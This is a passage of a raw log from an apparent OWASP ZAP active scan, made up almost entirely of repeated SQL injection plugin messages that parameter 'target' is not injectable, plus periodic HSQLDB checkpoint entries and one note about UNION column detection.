'target' is not injectable 8630047 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8630682 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8631609 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8632078 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8632631 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8633099 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8633623 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8634046 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8634454 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8634920 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8635474 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8635842 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8636250 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8636850 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8637434 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8638053 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8638459 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8638826 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8639284 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8639816 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8640794 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8641177 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8641665 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8642459 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8643085 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8643665 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8644208 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8644666 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8644938 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 8644938 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 8644943 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 8645448 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 8645451 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 8645726 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8646217 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8646689 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8647238 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8647631 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8648348 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8648852 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8649220 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8649620 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8650089 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8650918 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8651426 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8651925 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8652515 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8653275 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8654027 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8654641 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8655237 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8656223 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8656804 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8657236 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8657749 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8658187 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8658624 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8659388 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8659998 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8660564 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8661088 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8661560 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8662128 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8662536 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8663062 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8663647 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8664208 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8665071 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8665615 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8665951 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 8665951 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 8665957 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 8666232 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 8666234 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 8666300 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8666788 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8667185 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8667673 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8668216 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8668640 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8669134 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 8669246 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8669298 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 999 column in query 8670014 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8671090 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8671724 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8672186 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8672640 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8673057 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8673617 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8674067 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8674602 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8674994 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8675391 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8675809 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8676712 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8677492 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8678044 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8678486 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8679001 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8679512 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8680056 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8680496 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8681276 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8681636 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8682392 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8682864 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8683436 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8684005 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8684437 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8685006 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8685391 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8685859 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8686077 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 8686077 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 8686083 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 8686616 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 8686619 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 8686896 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8687635 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8688257 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8688885 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8689462 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8690061 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8690816 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8691200 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8691628 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8692996 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8693400 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8693931 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8694418 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8694839 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8695445 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8696075 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8696716 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8697267 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8698131 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8698649 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8699126 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8699695 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8700313 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8701008 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8701471 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8701882 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8702517 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8703089 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8703768 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8704287 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8704885 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8705347 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8706351 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8706921 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8707557 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8708078 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8708532 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8709132 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8709873 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8710295 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8710752 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8711495 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8711916 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8712326 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8712759 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8713356 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8714082 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8714584 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8715195 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8715781 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8716386 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8717107 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8717554 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8718154 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8718773 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8719456 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8719931 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8720412 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8720462 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 8720462 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 8720467 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 8721024 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 8721026 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 8721448 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8721650 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8722011 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8722337 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8722480 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8722859 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8723044 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8723460 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8723641 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8723982 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8724260 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8724528 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8724980 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8725414 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8725762 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8725932 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8726366 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8726519 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8726997 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8727020 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8727587 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8727610 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8728381 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8728436 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8729114 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8729118 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8729706 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8729718 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8730475 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8730514 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8730856 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8731109 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8731249 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8731696 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8731710 [ZAP-ActiveScanner-1] INFO 